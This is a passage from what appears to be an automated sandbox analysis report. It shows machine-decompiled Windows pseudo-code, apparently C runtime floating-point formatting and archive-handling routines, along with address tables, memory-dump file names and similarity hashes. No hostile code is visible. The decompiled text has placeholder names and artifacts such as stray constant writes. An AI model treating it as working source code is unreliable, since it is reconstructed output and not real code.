                                                                            									E00196E03(0x1d00e0, 0xb);
                                                                            									goto L86;
                                                                            								}
                                                                            								_push(0x7d);
                                                                            								E00196BF5(_t563);
                                                                            								E0019E797( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024);
                                                                            								E00193C40(_t394);
                                                                            								E0019607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t529, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
                                                                            								_t378 = _t394 + 0x2274;
                                                                            								if( *(_t394 + 0x225c) != 0) {
                                                                            									continue;
                                                                            								}
                                                                            								goto L13;
                                                                            							}
                                                                            							goto L13;
                                                                            						}
                                                                            					}
                                                                            					_t392 = E001A0FBA();
                                                                            					 *(_t544 + 0x6b) = 0;
                                                                            					if(_t392 == 0) {
                                                                            						goto L8;
                                                                            					}
                                                                            					goto L7;
                                                                            				}
                                                                            			}





























































                                                                            0x0019348c
                                                                            0x00193491
                                                                            0x00193496
                                                                            0x00193498
                                                                            0x001934cf
                                                                            0x001934da
                                                                            0x001934dd
                                                                            0x001934e3
                                                                            0x001934e6
                                                                            0x001934fc
                                                                            0x00193501
                                                                            0x00193508
                                                                            0x00193516
                                                                            0x00193524
                                                                            0x0019352d
                                                                            0x00193539
                                                                            0x00193541
                                                                            0x00193546
                                                                            0x00193555
                                                                            0x0019355f
                                                                            0x00193561
                                                                            0x00193561
                                                                            0x00193563
                                                                            0x00193563
                                                                            0x00193569
                                                                            0x00000000
                                                                            0x00193569
                                                                            0x001934e8
                                                                            0x001934e9
                                                                            0x001934a0
                                                                            0x001934a3
                                                                            0x001934a5
                                                                            0x001934a6
                                                                            0x001934b8
                                                                            0x00000000
                                                                            0x001934b8
                                                                            0x0019349a
                                                                            0x0019349b
                                                                            0x00000000
                                                                            0x0019349b
                                                                            0x00193440
                                                                            0x00193443
                                                                            0x0019344a
                                                                            0x00193457
                                                                            0x00193463
                                                                            0x0019346b
                                                                            0x00193472
                                                                            0x00193472
                                                                            0x00000000
                                                                            0x00193443
                                                                            0x001933a1
                                                                            0x001933a3
                                                                            0x001933a6
                                                                            0x001933a8
                                                                            0x001933ab
                                                                            0x001933ad
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001933af
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001933b5
                                                                            0x001933bb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001933bb
                                                                            0x00193352
                                                                            0x0019335e
                                                                            0x00193365
                                                                            0x0019336a
                                                                            0x0019336e
                                                                            0x00000000
                                                                            0x00193370
                                                                            0x00193377
                                                                            0x0019337c
                                                                            0x00000000
                                                                            0x0019337c
                                                                            0x0019336e
                                                                            0x0019328b
                                                                            0x0019328d
                                                                            0x00000000
                                                                            0x0019328d
                                                                            0x0019313e
                                                                            0x00193141
                                                                            0x00193143
                                                                            0x00193149
                                                                            0x00000000
                                                                            0x0019315d
                                                                            0x00193162
                                                                            0x00193164
                                                                            0x00193167
                                                                            0x00193171
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00193184
                                                                            0x00193193
                                                                            0x00193193
                                                                            0x00193197
                                                                            0x00193199
                                                                            0x001931b5
                                                                            0x001931c1
                                                                            0x001931cd
                                                                            0x001931d9
                                                                            0x00193255
                                                                            0x00193255
                                                                            0x00000000
                                                                            0x001931db
                                                                            0x001931db
                                                                            0x001931e1
                                                                            0x001931e8
                                                                            0x001931ed
                                                                            0x001931f2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001931f4
                                                                            0x001931f8
                                                                            0x001931fb
                                                                            0x001931fc
                                                                            0x001931fd
                                                                            0x0019325a
                                                                            0x0019325c
                                                                            0x00193268
                                                                            0x0019326f
                                                                            0x00000000
                                                                            0x0019326f
                                                                            0x001931ff
                                                                            0x00193201
                                                                            0x00193212
                                                                            0x00193219
                                                                            0x00193241
                                                                            0x0019324d
                                                                            0x00193253
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00193253
                                                                            0x00000000
                                                                            0x001931e1
                                                                            0x001931d9
                                                                            0x00193186
                                                                            0x0019318b
                                                                            0x00193191
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00193191

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: H_prolog_memcmp
                                                                            • String ID: CMT$h%u$hc%u
                                                                            • API String ID: 3004599000-3282847064
                                                                            • Opcode ID: d039d4f4a95c9a1cdd3dd5c8eafcc407a7bce50e53cb85b4af7aa4eff2c3d283
                                                                            • Instruction ID: 0877549baba04c1817a79c2ffc7b27b35418afdcaa3d17b04fd4f04a4c99acc1
                                                                            • Opcode Fuzzy Hash: d039d4f4a95c9a1cdd3dd5c8eafcc407a7bce50e53cb85b4af7aa4eff2c3d283
                                                                            • Instruction Fuzzy Hash: 7E32C2715143849FDF18DF74C896AEA37A5AF25300F04457EFD9ACB286DB30AA49CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 68%
                                                                            			E001BC55E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                                                                            				signed int _v8;
                                                                            				signed int _v32;
                                                                            				signed int _v36;
                                                                            				char _v460;
                                                                            				signed int _v464;
                                                                            				void _v468;
                                                                            				signed int _v472;
                                                                            				signed int _v932;
                                                                            				signed int _v936;
                                                                            				signed int _v1392;
                                                                            				signed int _v1396;
                                                                            				signed int _v1400;
                                                                            				char _v1860;
                                                                            				signed int _v1864;
                                                                            				signed int _v1865;
                                                                            				signed int _v1872;
                                                                            				signed int _v1876;
                                                                            				signed int _v1880;
                                                                            				signed int _v1884;
                                                                            				signed int _v1888;
                                                                            				signed int _v1892;
                                                                            				signed int _v1896;
                                                                            				intOrPtr _v1900;
                                                                            				signed int _v1904;
                                                                            				signed int _v1908;
                                                                            				signed int _v1912;
                                                                            				signed int _v1916;
                                                                            				signed int _v1920;
                                                                            				signed int _v1924;
                                                                            				signed int _v1928;
                                                                            				char _v1936;
                                                                            				char _v1944;
                                                                            				char _v2404;
                                                                            				signed int _v2408;
                                                                            				signed int _t743;
                                                                            				signed int _t753;
                                                                            				signed int _t754;
                                                                            				intOrPtr _t763;
                                                                            				signed int _t764;
                                                                            				intOrPtr _t767;
                                                                            				intOrPtr _t770;
                                                                            				intOrPtr _t772;
                                                                            				intOrPtr _t773;
                                                                            				void* _t774;
                                                                            				signed int _t777;
                                                                            				signed int _t778;
                                                                            				signed int _t784;
                                                                            				signed int _t790;
                                                                            				intOrPtr _t792;
                                                                            				void* _t793;
                                                                            				signed int _t794;
                                                                            				signed int _t795;
                                                                            				signed int _t796;
                                                                            				signed int _t805;
                                                                            				signed int _t810;
                                                                            				signed int _t811;
                                                                            				signed int _t812;
                                                                            				signed int _t815;
                                                                            				signed int _t816;
                                                                            				signed int _t817;
                                                                            				signed int _t819;
                                                                            				signed int _t820;
                                                                            				signed int _t825;
                                                                            				signed int _t826;
                                                                            				signed int _t832;
                                                                            				signed int _t833;
                                                                            				signed int _t836;
                                                                            				signed int _t841;
                                                                            				signed int _t849;
                                                                            				signed int* _t852;
                                                                            				signed int _t856;
                                                                            				signed int _t867;
                                                                            				signed int _t868;
                                                                            				signed int _t870;
                                                                            				char* _t871;
                                                                            				signed int _t874;
                                                                            				signed int _t878;
                                                                            				signed int _t879;
                                                                            				signed int _t884;
                                                                            				signed int _t886;
                                                                            				signed int _t891;
                                                                            				signed int _t900;
                                                                            				signed int _t903;
                                                                            				signed int _t905;
                                                                            				signed int _t908;
                                                                            				signed int _t909;
                                                                            				signed int _t910;
                                                                            				signed int _t913;
                                                                            				signed int _t926;
                                                                            				signed int _t927;
                                                                            				signed int _t929;
                                                                            				char* _t930;
                                                                            				signed int _t933;
                                                                            				signed int _t937;
                                                                            				signed int _t938;
                                                                            				signed int* _t940;
                                                                            				signed int _t943;
                                                                            				signed int _t945;
                                                                            				signed int _t950;
                                                                            				signed int _t958;
                                                                            				signed int _t961;
                                                                            				signed int _t965;
                                                                            				signed int* _t972;
                                                                            				intOrPtr _t974;
                                                                            				void* _t975;
                                                                            				intOrPtr* _t977;
                                                                            				signed int* _t981;
                                                                            				unsigned int _t992;
                                                                            				signed int _t993;
                                                                            				void* _t996;
                                                                            				signed int _t997;
                                                                            				void* _t999;
                                                                            				signed int _t1000;
                                                                            				signed int _t1001;
                                                                            				signed int _t1002;
                                                                            				signed int _t1012;
                                                                            				signed int _t1017;
                                                                            				signed int _t1020;
                                                                            				unsigned int _t1023;
                                                                            				signed int _t1024;
                                                                            				void* _t1027;
                                                                            				signed int _t1028;
                                                                            				void* _t1030;
                                                                            				signed int _t1031;
                                                                            				signed int _t1032;
                                                                            				signed int _t1033;
                                                                            				signed int _t1038;
                                                                            				signed int* _t1043;
                                                                            				signed int _t1045;
                                                                            				signed int _t1055;
                                                                            				void _t1058;
                                                                            				signed int _t1061;
                                                                            				void* _t1064;
                                                                            				void* _t1071;
                                                                            				signed int _t1077;
                                                                            				signed int _t1078;
                                                                            				signed int _t1081;
                                                                            				signed int _t1082;
                                                                            				signed int _t1084;
                                                                            				signed int _t1085;
                                                                            				signed int _t1086;
                                                                            				signed int _t1090;
                                                                            				signed int _t1094;
                                                                            				signed int _t1095;
                                                                            				signed int _t1096;
                                                                            				signed int _t1098;
                                                                            				signed int _t1099;
                                                                            				signed int _t1100;
                                                                            				signed int _t1101;
                                                                            				signed int _t1102;
                                                                            				signed int _t1103;
                                                                            				signed int _t1105;
                                                                            				signed int _t1106;
                                                                            				signed int _t1107;
                                                                            				signed int _t1108;
                                                                            				signed int _t1109;
                                                                            				signed int _t1110;
                                                                            				unsigned int _t1111;
                                                                            				void* _t1114;
                                                                            				intOrPtr _t1116;
                                                                            				signed int _t1117;
                                                                            				signed int _t1118;
                                                                            				signed int _t1119;
                                                                            				signed int* _t1123;
                                                                            				void* _t1127;
                                                                            				void* _t1128;
                                                                            				signed int _t1129;
                                                                            				signed int _t1130;
                                                                            				signed int _t1131;
                                                                            				signed int _t1134;
                                                                            				signed int _t1135;
                                                                            				signed int _t1140;
                                                                            				void* _t1142;
                                                                            				signed int _t1143;
                                                                            				signed int _t1146;
                                                                            				char _t1151;
                                                                            				signed int _t1153;
                                                                            				signed int _t1154;
                                                                            				signed int _t1155;
                                                                            				signed int _t1156;
                                                                            				signed int _t1157;
                                                                            				signed int _t1158;
                                                                            				signed int _t1159;
                                                                            				signed int _t1163;
                                                                            				signed int _t1164;
                                                                            				signed int _t1165;
                                                                            				signed int _t1166;
                                                                            				signed int _t1167;
                                                                            				unsigned int _t1170;
                                                                            				void* _t1174;
                                                                            				void* _t1175;
                                                                            				unsigned int _t1176;
                                                                            				signed int _t1181;
                                                                            				signed int _t1182;
                                                                            				signed int _t1184;
                                                                            				signed int _t1185;
                                                                            				intOrPtr* _t1187;
                                                                            				signed int _t1188;
                                                                            				signed int _t1190;
                                                                            				signed int _t1191;
                                                                            				signed int _t1194;
                                                                            				signed int _t1196;
                                                                            				signed int _t1197;
                                                                            				void* _t1198;
                                                                            				signed int _t1199;
                                                                            				signed int _t1200;
                                                                            				signed int _t1201;
                                                                            				void* _t1204;
                                                                            				signed int _t1205;
                                                                            				signed int _t1206;
                                                                            				signed int _t1207;
                                                                            				signed int _t1208;
                                                                            				signed int _t1209;
                                                                            				signed int* _t1212;
                                                                            				signed int _t1213;
                                                                            				signed int _t1214;
                                                                            				signed int _t1215;
                                                                            				signed int _t1216;
                                                                            				intOrPtr* _t1218;
                                                                            				intOrPtr* _t1219;
                                                                            				signed int _t1221;
                                                                            				signed int _t1223;
                                                                            				signed int _t1226;
                                                                            				signed int _t1232;
                                                                            				signed int _t1236;
                                                                            				signed int _t1237;
                                                                            				signed int _t1242;
                                                                            				signed int _t1245;
                                                                            				signed int _t1246;
                                                                            				signed int _t1247;
                                                                            				signed int _t1248;
                                                                            				signed int _t1249;
                                                                            				signed int _t1250;
                                                                            				signed int _t1252;
                                                                            				signed int _t1253;
                                                                            				signed int _t1254;
                                                                            				signed int _t1255;
                                                                            				signed int _t1257;
                                                                            				signed int _t1258;
                                                                            				signed int _t1259;
                                                                            				signed int _t1260;
                                                                            				signed int _t1261;
                                                                            				signed int _t1263;
                                                                            				signed int _t1264;
                                                                            				signed int _t1266;
                                                                            				signed int _t1268;
                                                                            				signed int _t1270;
                                                                            				signed int _t1273;
                                                                            				signed int _t1275;
                                                                            				signed int* _t1276;
                                                                            				signed int* _t1279;
                                                                            				signed int _t1288;
                                                                            
                                                                            				_t1142 = __edx;
                                                                            				_t1273 = _t1275;
                                                                            				_t1276 = _t1275 - 0x964;
                                                                            				_t743 =  *0x1cd668; // 0x44aa1787
                                                                            				_v8 = _t743 ^ _t1273;
                                                                            				_t1055 = _a20;
                                                                            				_push(__esi);
                                                                            				_push(__edi);
                                                                            				_t1187 = _a16;
                                                                            				_v1924 = _t1187;
                                                                            				_v1920 = _t1055;
                                                                            				E001BC078( &_v1944, __eflags);
                                                                            				_t1236 = _a8;
                                                                            				_t748 = 0x2d;
                                                                            				if((_t1236 & 0x80000000) == 0) {
                                                                            					_t748 = 0x120;
                                                                            				}
                                                                            				 *_t1187 = _t748;
                                                                            				 *((intOrPtr*)(_t1187 + 8)) = _t1055;
                                                                            				_t1188 = _a4;
                                                                            				if((_t1236 & 0x7ff00000) != 0) {
                                                                            					L5:
                                                                            					_t753 = E001B86BF( &_a4);
                                                                            					_pop(_t1070);
                                                                            					__eflags = _t753;
                                                                            					if(_t753 != 0) {
                                                                            						_t1070 = _v1924;
                                                                            						 *((intOrPtr*)(_v1924 + 4)) = 1;
                                                                            					}
                                                                            					_t754 = _t753 - 1;
                                                                            					__eflags = _t754;
                                                                            					if(_t754 == 0) {
                                                                            						_push("1#INF");
                                                                            						goto L308;
                                                                            					} else {
                                                                            						_t777 = _t754 - 1;
                                                                            						__eflags = _t777;
                                                                            						if(_t777 == 0) {
                                                                            							_push("1#QNAN");
                                                                            							goto L308;
                                                                            						} else {
                                                                            							_t778 = _t777 - 1;
                                                                            							__eflags = _t778;
                                                                            							if(_t778 == 0) {
                                                                            								_push("1#SNAN");
                                                                            								goto L308;
                                                                            							} else {
                                                                            								__eflags = _t778 == 1;
                                                                            								if(_t778 == 1) {
                                                                            									_push("1#IND");
                                                                            									goto L308;
                                                                            								} else {
                                                                            									_v1928 = _v1928 & 0x00000000;
                                                                            									_a4 = _t1188;
                                                                            									_a8 = _t1236 & 0x7fffffff;
                                                                            									_t1288 = _a4;
                                                                            									asm("fst qword [ebp-0x768]");
                                                                            									_t1190 = _v1896;
                                                                            									_v1916 = _a12 + 1;
                                                                            									_t1077 = _t1190 >> 0x14;
                                                                            									_t784 = _t1077 & 0x000007ff;
                                                                            									__eflags = _t784;
                                                                            									if(_t784 != 0) {
                                                                            										_t1143 = 0;
                                                                            										_t784 = 0;
                                                                            										__eflags = 0;
                                                                            									} else {
                                                                            										_t1143 = 1;
                                                                            									}
                                                                            									_t1191 = _t1190 & 0x000fffff;
                                                                            									_t1058 = _v1900 + _t784;
                                                                            									asm("adc edi, esi");
                                                                            									__eflags = _t1143;
                                                                            									_t1078 = _t1077 & 0x000007ff;
                                                                            									_t1242 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
                                                                            									_v1872 = _t1242;
                                                                            									E001BE0C0(_t1078, _t1288);
                                                                            									_push(_t1078);
                                                                            									_push(_t1078);
                                                                            									 *_t1276 = _t1288;
                                                                            									_t790 = E001C0F10(E001BE1D0(_t1191, _t1242), _t1288);
                                                                            									_v1904 = _t790;
                                                                            									__eflags = _t790 - 0x7fffffff;
                                                                            									if(_t790 == 0x7fffffff) {
                                                                            										L16:
                                                                            										__eflags = 0;
                                                                            										_v1904 = 0;
                                                                            									} else {
                                                                            										__eflags = _t790 - 0x80000000;
                                                                            										if(_t790 == 0x80000000) {
                                                                            											goto L16;
                                                                            										}
                                                                            									}
                                                                            									_v468 = _t1058;
                                                                            									__eflags = _t1191;
                                                                            									_v464 = _t1191;
                                                                            									_t1061 = (0 | _t1191 != 0x00000000) + 1;
                                                                            									_v472 = _t1061;
                                                                            									__eflags = _t1242;
                                                                            									if(_t1242 < 0) {
                                                                            										__eflags = _t1242 - 0xfffffc02;
                                                                            										if(_t1242 == 0xfffffc02) {
                                                                            											L101:
                                                                            											_t792 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
                                                                            											_t195 =  &_v1896;
                                                                            											 *_t195 = _v1896 & 0x00000000;
                                                                            											__eflags =  *_t195;
                                                                            											asm("bsr eax, eax");
                                                                            											if( *_t195 == 0) {
                                                                            												_t1081 = 0;
                                                                            												__eflags = 0;
                                                                            											} else {
                                                                            												_t1081 = _t792 + 1;
                                                                            											}
                                                                            											_t793 = 0x20;
                                                                            											_t794 = _t793 - _t1081;
                                                                            											__eflags = _t794 - 1;
                                                                            											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
                                                                            											__eflags = _t1061 - 0x73;
                                                                            											_v1865 = _t795;
                                                                            											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
                                                                            											__eflags = _t1061 - 0x73;
                                                                            											if(_t1061 != 0x73) {
                                                                            												L107:
                                                                            												_t796 = 0;
                                                                            												__eflags = 0;
                                                                            											} else {
                                                                            												__eflags = _t795;
                                                                            												if(_t795 == 0) {
                                                                            													goto L107;
                                                                            												} else {
                                                                            													_t796 = 1;
                                                                            												}
                                                                            											}
                                                                            											__eflags = _t1082;
                                                                            											if(_t1082 != 0) {
                                                                            												L126:
                                                                            												_v1400 = _v1400 & 0x00000000;
                                                                            												_t224 =  &_v472;
                                                                            												 *_t224 = _v472 & 0x00000000;
                                                                            												__eflags =  *_t224;
                                                                            												E001BAA64( &_v468, 0x1cc,  &_v1396, 0);
                                                                            												_t1276 =  &(_t1276[4]);
                                                                            											} else {
                                                                            												__eflags = _t796;
                                                                            												if(_t796 != 0) {
                                                                            													goto L126;
                                                                            												} else {
                                                                            													_t1109 = 0x72;
                                                                            													__eflags = _t1061 - _t1109;
                                                                            													if(_t1061 < _t1109) {
                                                                            														_t1109 = _t1061;
                                                                            													}
                                                                            													__eflags = _t1109 - 0xffffffff;
                                                                            													if(_t1109 != 0xffffffff) {
                                                                            														_t1260 = _t1109;
                                                                            														_t1218 =  &_v468 + _t1109 * 4;
                                                                            														_v1880 = _t1218;
                                                                            														while(1) {
                                                                            															__eflags = _t1260 - _t1061;
                                                                            															if(_t1260 >= _t1061) {
                                                                            																_t208 =  &_v1876;
                                                                            																 *_t208 = _v1876 & 0x00000000;
                                                                            																__eflags =  *_t208;
                                                                            															} else {
                                                                            																_v1876 =  *_t1218;
                                                                            															}
                                                                            															_t210 = _t1260 - 1; // 0x70
                                                                            															__eflags = _t210 - _t1061;
                                                                            															if(_t210 >= _t1061) {
                                                                            																_t1170 = 0;
                                                                            																__eflags = 0;
                                                                            															} else {
                                                                            																_t1170 =  *(_t1218 - 4);
                                                                            															}
                                                                            															_t1218 = _t1218 - 4;
                                                                            															_t972 = _v1880;
                                                                            															_t1260 = _t1260 - 1;
                                                                            															 *_t972 = _t1170 >> 0x0000001f ^ _v1876 + _v1876;
                                                                            															_v1880 = _t972 - 4;
                                                                            															__eflags = _t1260 - 0xffffffff;
                                                                            															if(_t1260 == 0xffffffff) {
                                                                            																break;
                                                                            															}
                                                                            															_t1061 = _v472;
                                                                            														}
                                                                            														_t1242 = _v1872;
                                                                            													}
                                                                            													__eflags = _v1865;
                                                                            													if(_v1865 == 0) {
                                                                            														_v472 = _t1109;
                                                                            													} else {
                                                                            														_t218 = _t1109 + 1; // 0x73
                                                                            														_v472 = _t218;
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            											_t1194 = 1 - _t1242;
                                                                            											E001AE920(_t1194,  &_v1396, 0, 1);
                                                                            											__eflags = 1;
                                                                            											 *(_t1273 + 0xbad63d) = 1 << (_t1194 & 0x0000001f);
                                                                            											_t805 = 0xbadbae;
                                                                            										} else {
                                                                            											_v1396 = _v1396 & 0x00000000;
                                                                            											_t1110 = 2;
                                                                            											_v1392 = 0x100000;
                                                                            											_v1400 = _t1110;
                                                                            											__eflags = _t1061 - _t1110;
                                                                            											if(_t1061 == _t1110) {
                                                                            												_t1174 = 0;
                                                                            												__eflags = 0;
                                                                            												while(1) {
                                                                            													_t974 =  *((intOrPtr*)(_t1273 + _t1174 - 0x570));
                                                                            													__eflags = _t974 -  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0));
                                                                            													if(_t974 !=  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0))) {
                                                                            														goto L101;
                                                                            													}
                                                                            													_t1174 = _t1174 + 4;
                                                                            													__eflags = _t1174 - 8;
                                                                            													if(_t1174 != 8) {
                                                                            														continue;
                                                                            													} else {
                                                                            														_t166 =  &_v1896;
                                                                            														 *_t166 = _v1896 & 0x00000000;
                                                                            														__eflags =  *_t166;
                                                                            														asm("bsr eax, edi");
                                                                            														if( *_t166 == 0) {
                                                                            															_t1175 = 0;
                                                                            															__eflags = 0;
                                                                            														} else {
                                                                            															_t1175 = _t974 + 1;
                                                                            														}
                                                                            														_t975 = 0x20;
                                                                            														_t1261 = _t1110;
                                                                            														__eflags = _t975 - _t1175 - _t1110;
                                                                            														_t977 =  &_v460;
                                                                            														_v1880 = _t977;
                                                                            														_t1219 = _t977;
                                                                            														_t171 =  &_v1865;
                                                                            														 *_t171 = _t975 - _t1175 - _t1110 > 0;
                                                                            														__eflags =  *_t171;
                                                                            														while(1) {
                                                                            															__eflags = _t1261 - _t1061;
                                                                            															if(_t1261 >= _t1061) {
                                                                            																_t173 =  &_v1876;
                                                                            																 *_t173 = _v1876 & 0x00000000;
                                                                            																__eflags =  *_t173;
                                                                            															} else {
                                                                            																_v1876 =  *_t1219;
                                                                            															}
                                                                            															_t175 = _t1261 - 1; // 0x0
                                                                            															__eflags = _t175 - _t1061;
                                                                            															if(_t175 >= _t1061) {
                                                                            																_t1176 = 0;
                                                                            																__eflags = 0;
                                                                            															} else {
                                                                            																_t1176 =  *(_t1219 - 4);
                                                                            															}
                                                                            															_t1219 = _t1219 - 4;
                                                                            															_t981 = _v1880;
                                                                            															_t1261 = _t1261 - 1;
                                                                            															 *_t981 = _t1176 >> 0x0000001e ^ _v1876 << 0x00000002;
                                                                            															_v1880 = _t981 - 4;
                                                                            															__eflags = _t1261 - 0xffffffff;
                                                                            															if(_t1261 == 0xffffffff) {
                                                                            																break;
                                                                            															}
                                                                            															_t1061 = _v472;
                                                                            														}
                                                                            														__eflags = _v1865;
                                                                            														_t1111 = _t1110 - _v1872;
                                                                            														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
                                                                            														_t1221 = _t1111 >> 5;
                                                                            														_v1884 = _t1111;
                                                                            														_t1263 = _t1221 << 2;
                                                                            														E001AE920(_t1221,  &_v1396, 0, _t1263);
                                                                            														 *(_t1273 + _t1263 - 0x570) = 1 << (_v1884 & 0x0000001f);
                                                                            														_t805 = _t1221 + 1;
                                                                            													}
                                                                            													goto L128;
                                                                            												}
                                                                            											}
                                                                            											goto L101;
                                                                            										}
                                                                            										L128:
                                                                            										_v1400 = _t805;
                                                                            										_t1064 = 0x1cc;
                                                                            										_v936 = _t805;
                                                                            										__eflags = _t805 << 2;
                                                                            										E001BAA64( &_v932, 0x1cc,  &_v1396, _t805 << 2);
                                                                            										_t1279 =  &(_t1276[7]);
                                                                            									} else {
                                                                            										_v1396 = _v1396 & 0x00000000;
                                                                            										_t1264 = 2;
                                                                            										_v1392 = 0x100000;
                                                                            										_v1400 = _t1264;
                                                                            										__eflags = _t1061 - _t1264;
                                                                            										if(_t1061 != _t1264) {
                                                                            											L53:
                                                                            											_t992 = _v1872 + 1;
                                                                            											_t993 = _t992 & 0x0000001f;
                                                                            											_t1114 = 0x20;
                                                                            											_v1876 = _t993;
                                                                            											_t1223 = _t992 >> 5;
                                                                            											_v1872 = _t1223;
                                                                            											_v1908 = _t1114 - _t993;
                                                                            											_t996 = E001ADDA0(1, _t1114 - _t993, 0);
                                                                            											_t1116 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
                                                                            											_t997 = _t996 - 1;
                                                                            											_t108 =  &_v1896;
                                                                            											 *_t108 = _v1896 & 0x00000000;
                                                                            											__eflags =  *_t108;
                                                                            											asm("bsr ecx, ecx");
                                                                            											_v1884 = _t997;
                                                                            											_v1912 =  !_t997;
                                                                            											if( *_t108 == 0) {
                                                                            												_t1117 = 0;
                                                                            												__eflags = 0;
                                                                            											} else {
                                                                            												_t1117 = _t1116 + 1;
                                                                            											}
                                                                            											_t999 = 0x20;
                                                                            											_t1000 = _t999 - _t1117;
                                                                            											_t1181 = _t1061 + _t1223;
                                                                            											__eflags = _v1876 - _t1000;
                                                                            											_v1892 = _t1181;
                                                                            											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
                                                                            											__eflags = _t1181 - 0x73;
                                                                            											_v1865 = _t1001;
                                                                            											_t1118 = _t1117 & 0xffffff00 | _t1181 - 0x00000073 > 0x00000000;
                                                                            											__eflags = _t1181 - 0x73;
                                                                            											if(_t1181 != 0x73) {
                                                                            												L59:
                                                                            												_t1002 = 0;
                                                                            												__eflags = 0;
                                                                            											} else {
                                                                            												__eflags = _t1001;
                                                                            												if(_t1001 == 0) {
                                                                            													goto L59;
                                                                            												} else {
                                                                            													_t1002 = 1;
                                                                            												}
                                                                            											}
                                                                            											__eflags = _t1118;
                                                                            											if(_t1118 != 0) {
                                                                            												L81:
                                                                            												__eflags = 0;
                                                                            												_t1064 = 0x1cc;
                                                                            												_v1400 = 0;
                                                                            												_v472 = 0;
                                                                            												E001BAA64( &_v468, 0x1cc,  &_v1396, 0);
                                                                            												_t1276 =  &(_t1276[4]);
                                                                            											} else {
                                                                            												__eflags = _t1002;
                                                                            												if(_t1002 != 0) {
                                                                            													goto L81;
                                                                            												} else {
                                                                            													_t1119 = 0x72;
                                                                            													__eflags = _t1181 - _t1119;
                                                                            													if(_t1181 >= _t1119) {
                                                                            														_t1181 = _t1119;
                                                                            														_v1892 = _t1119;
                                                                            													}
                                                                            													_t1012 = _t1181;
                                                                            													_v1880 = _t1012;
                                                                            													__eflags = _t1181 - 0xffffffff;
                                                                            													if(_t1181 != 0xffffffff) {
                                                                            														_t1182 = _v1872;
                                                                            														_t1266 = _t1181 - _t1182;
                                                                            														__eflags = _t1266;
                                                                            														_t1123 =  &_v468 + _t1266 * 4;
                                                                            														_v1888 = _t1123;
                                                                            														while(1) {
                                                                            															__eflags = _t1012 - _t1182;
                                                                            															if(_t1012 < _t1182) {
                                                                            																break;
                                                                            															}
                                                                            															__eflags = _t1266 - _t1061;
                                                                            															if(_t1266 >= _t1061) {
                                                                            																_t1226 = 0;
                                                                            																__eflags = 0;
                                                                            															} else {
                                                                            																_t1226 =  *_t1123;
                                                                            															}
                                                                            															__eflags = _t1266 - 1 - _t1061;
                                                                            															if(_t1266 - 1 >= _t1061) {
                                                                            																_t1017 = 0;
                                                                            																__eflags = 0;
                                                                            															} else {
                                                                            																_t1017 =  *(_t1123 - 4);
                                                                            															}
                                                                            															_t1020 = _v1880;
                                                                            															_t1123 = _v1888 - 4;
                                                                            															_v1888 = _t1123;
                                                                            															 *(_t1273 + _t1020 * 4 - 0x1d0) = (_t1226 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
                                                                            															_t1012 = _t1020 - 1;
                                                                            															_t1266 = _t1266 - 1;
                                                                            															_v1880 = _t1012;
                                                                            															__eflags = _t1012 - 0xffffffff;
                                                                            															if(_t1012 != 0xffffffff) {
                                                                            																_t1061 = _v472;
                                                                            																continue;
                                                                            															}
                                                                            															break;
                                                                            														}
                                                                            														_t1181 = _v1892;
                                                                            														_t1223 = _v1872;
                                                                            														_t1264 = 2;
                                                                            													}
                                                                            													__eflags = _t1223;
                                                                            													if(_t1223 != 0) {
                                                                            														__eflags = 0;
                                                                            														memset( &_v468, 0, _t1223 << 2);
                                                                            														_t1276 =  &(_t1276[3]);
                                                                            													}
                                                                            													__eflags = _v1865;
                                                                            													_t1064 = 0x1cc;
                                                                            													if(_v1865 == 0) {
                                                                            														_v472 = _t1181;
                                                                            													} else {
                                                                            														_v472 = _t1181 + 1;
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            											_v1392 = _v1392 & 0x00000000;
                                                                            											_v1396 = _t1264;
                                                                            											_v1400 = 1;
                                                                            											_v936 = 1;
                                                                            											_push(4);
                                                                            										} else {
                                                                            											_t1127 = 0;
                                                                            											__eflags = 0;
                                                                            											while(1) {
                                                                            												__eflags =  *((intOrPtr*)(_t1273 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0));
                                                                            												if( *((intOrPtr*)(_t1273 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0))) {
                                                                            													goto L53;
                                                                            												}
